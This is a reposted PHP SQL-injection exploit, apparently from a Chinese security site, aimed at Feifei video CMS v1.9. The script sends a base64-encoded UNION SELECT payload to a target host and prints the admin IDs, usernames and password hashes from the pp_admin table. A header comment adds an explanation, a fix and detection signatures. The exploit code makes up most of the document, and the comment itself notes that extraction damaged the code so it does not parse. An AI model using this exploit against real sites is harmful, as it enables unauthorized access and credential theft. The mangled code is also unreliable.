飞飞影视系统PHP版 v1.9 injection exploit

没穿底裤 2019年12月31日 20:18:27
<?php 
/** 
* Feifei video management system (飞飞影视管理系统) SQL injection 
* Feifei video system, PHP edition v1.9: injection proof-of-concept 
* by:www.08sec.com fans 
* keyword "Powered by www.ff84.com" 
*
* What the listing does:
*  - Reads <host> and <path> from argv. $path is assigned but never used; the
*    request line is fixed to "/?s=vod-read-id-1" + suffix + "html".
*  - Builds a raw HTTP POST with an empty body ($content is "", so
*    Content-Length is 0). The suffix appended to the numeric id segment is
*    stored base64-encoded; decoded, it is a URL-encoded
*    "and 1=2 union select" over 29 columns, where column 27 concatenates
*    admin_id, admin_name and admin_pwd from the pp_admin table, each wrapped
*    in "@" (0x40) so the values can be picked out of the rendered page.
*  - sendpack() resolves $host, opens TCP port 80, writes the packet and reads
*    the whole reply into the global $html.
*  - Success is judged by the string "Tpl" appearing in the reply; the first
*    "@...@" match in the reply is then printed.
*
* Reviewer notes (defensive):
*  - Root cause is presumably that the id segment of ?s=vod-read-id-<id>
*    reaches a SQL query without being forced to an integer. The server-side
*    code is not shown on this page, so confirm against the CMS source.
*    The durable fix is to validate/cast the id as an integer and to use
*    parameterized queries for the lookup.
*  - Detection: requests whose "s" parameter starts with "vod-read-id-" and
*    carries anything other than digits in the id position, in particular
*    "union", "select", "pp_admin" or "0x40". Secondary signals visible in
*    this script: a POST with Content-Length 0 to a read-only page, and a
*    malformed header where the value itself begins with "User-Agent:"
*    (the prefix is added twice) followed by Firefox/5.0.1 on Windows NT 5.2.
*  - If such requests appear in access logs, treat the admin_name/admin_pwd
*    values stored in pp_admin as disclosed and rotate them.
*  - The listing is damaged by page extraction and does not parse as shown.
*    It is reproduced unchanged below as reference material.
*/ error_reporting(E_ERROR); set_time_limit(0);  if ($argc<3) { print_r('
------------------------------------------------------ 
Usage: php '.$argv[0].
host path host: 
target server (ip/hostname),without"http://" 
path:path to ff84cms 
Example: 
php '.$argv[0].' localhost / 
------------------------------------------------------- 
');
die; }  $host=$argv[1]; $path=$argv[2]; $html='';  $cookie=""; $agent=" User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1"; $content=""; $data= "POST /?s=vod-read-id-1".base64_decode('JTIwYW5kJTIwMT0yJTIwdW5pb24lMjBzZWxlY3QlMjAxLDIsMyw0LDUsNiw3LDgsOSwxMCwxMSwxMiwxMywxNCwxNSwxNiwxNywxOCwxOSwyMCwyMSwyMiwyMywyNCwyNSwyNixjb25jYXQoMHg0MCxhZG1pbl9pZCwweDQwLGFkbWluX25hbWUsMHg0MCxhZG1pbl9wd2QsMHg0MCksMjgsMjklMjBmcm9tJTIwcHBfYWRtaW4tLQ==')."html HTTP/1.1/r/n"; $data.= "Host: ".$host."/r/n"; //$data .="Cookie: ".$cookie."/r/n"; $data.= "User-Agent: ".$agent. "/r/n"; $data.= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8/r/n"; $data.= "Accept-Language: zh-cn,zh;q=0.5/r/n"; $data.= "Accept-Encoding: gzip,deflate/r/n";$data .= "Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7/r/n"; $data.= "Connection: keep-alive/r/n"; $data.= "Content-Type: application/x-www-form-urlencoded/r/n"; $data.= "Content-Length: ".strlen($content)."/r/n/r/n"; $data.= $content."/r/n";  Sendpack($data);  if (!eregi("Tpl",$html)){ // echo $packet."/r/n"; // echo $html."/r/n"; die("Exploit failed..."); }else{ $pattern="/@(.*)@/i"; preg_match($pattern,$html,$pg); echo"$pg[1]/r/n/r/n"; echo"/r/nExploit succeeded.../r/n"; }  Function sendpack ($packet) { global $host, $html; $ock=fsockopen(gethostbyname($host),'80'); if (!$ock) { echo'No response from '.$host; die; } fputs($ock,$packet); $html=''; while (!feof($ock)) { $html.=fgets($ock); } fclose($ock); }

  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   飞飞影视系统PHP版 v1.9 injection exploithttp://cn-sec.com/archives/75107.html
